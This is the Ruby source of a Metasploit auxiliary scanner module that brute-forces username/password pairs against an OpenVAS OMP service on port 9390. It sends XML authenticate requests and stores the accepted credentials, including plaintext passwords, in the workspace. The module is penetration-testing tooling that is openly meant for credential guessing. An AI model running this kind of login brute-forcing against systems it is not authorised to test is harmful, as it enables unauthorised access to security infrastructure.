
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
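# Auxiliary scanner that checks username/password pairs against an OpenVAS
# OMP service over TCP.
#
# Every guess opens its own connection, sends one <authenticate> element and
# closes the connection again, so a run shows up on the target as a series of
# short sessions to the OMP port, one per credential tried. Pairs the service
# accepts are recorded through create_credential / create_credential_login.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Registers the module metadata and its options: the default remote port
  # (9390) and the BLANK_PASSWORDS switch, which defaults to false.
  def initialize
    super(
      'Name' => 'OpenVAS OMP Login Utility',
      'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.',
      'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(9390),
        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
      ]
    )
  end

  # Scanner entry point for one host: walks the configured user/password
  # pairs and hands each one to do_login.
  #
  # @param ip [String] address of the host being scanned (not read here; the
  #   other methods use rhost/rport)
  # @return [Object, nil] whatever each_user_pass returns, or the rescue result
  def run_host(ip)
    print_status("#{msg} Connecting and checking username and passwords")
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  rescue ::Rex::ConnectionError
    # Deliberately quiet: a connection error ends the run for this host.
  rescue ::StandardError => e
    # StandardError rather than Exception, so Interrupt and SystemExit are
    # not swallowed and a running scan can still be stopped.
    vprint_error("#{msg} #{e} #{e.backtrace}")
  end

  # Sends one request to the service and keeps the first chunk of the reply
  # in @result.
  #
  # @param data [String, nil] request text written to the socket
  # @param con [Boolean] when true, open a new connection before sending
  # @return [String, nil] the reply read from the socket; after an error,
  #   the return value of print_error
  def omp_send(data=nil, con=true)
    @result = ''
    @coderesult = ''
    if con
      @connected = false
      connect
      # Short pause after connecting, before the request is written.
      select(nil, nil, nil, 0.4)
    end
    @connected = true
    sock.put(data)
    @result = sock.get_once
  rescue ::StandardError => err
    # Errors are reported and swallowed here, so the caller sees an empty
    # @result (and @connected still false when connect itself failed).
    # StandardError rather than Exception keeps Interrupt/SystemExit alive.
    print_error("#{msg} Error: #{err}")
  end

  # Records an accepted login: builds the service and credential hashes,
  # creates the credential and attaches a successful login entry to it.
  #
  # The password is stored as given (private_type :password) and :proof is
  # whatever the caller passes in, so the workspace holding these records
  # needs the same protection as the credentials themselves.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  # @return [Object] the value returned by create_credential_login
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Tries one username/password pair against the service.
  #
  # @param user [String, nil] username to try
  # @param pass [String, nil] password to try
  # @return [Symbol, nil] :next_user when the pair is accepted, :fail when it
  #   is not, nil when one of the rescued connection errors was raised
  def do_login(user=nil,pass=nil)
    vprint_status("#{msg} Trying user:'#{user}' with password:'#{pass}'")
    # NOTE(review): user and pass are interpolated into the XML unescaped, so
    # a value containing '<' or '&' produces a malformed request.
    cmd = "<authenticate><credentials><username>#{user}</username><password>#{pass}</password></credentials></authenticate><HELP/>\r\n"
    omp_send(cmd,true) # always a fresh connection for each attempt

    # The status attribute has to sit inside the authenticate_response tag
    # itself ([^>]*), so status="200" on a later element of the same reply is
    # not mistaken for an accepted login. No /s flag: in Ruby it selects the
    # Windows-31J pattern encoding instead of making '.' match newlines, and
    # such a pattern raises Encoding::CompatibilityError on a reply holding
    # non-ASCII bytes in another encoding.
    if @result =~ /<authenticate_response[^>]*status="200"/i
      print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")
      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'openvas-omp',
        user: user,
        password: pass,
        proof: @result # the raw reply is kept as proof of the login
      )
      disconnect
      @connected = false
      return :next_user
    end

    if @connected
      disconnect # OpenVAS sometimes drops the client itself after wrong attempts
      @connected = false
    end
    # NOTE(review): omp_send swallows its own errors, so a failed connection
    # also lands here and is reported as a rejected pair.
    vprint_error("#{msg} Rejected user: '#{user}' with password: '#{pass}': #{@result}")
    :fail
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    # Connection-level failure: give up on this pair quietly (returns nil).
  rescue ::Timeout::Error, ::Errno::EPIPE
    # Timeout or broken pipe: likewise quiet (returns nil).
  end

  # @return [String] log prefix naming the target host and port
  def msg
    "#{rhost}:#{rport} OpenVAS OMP -"
  end
end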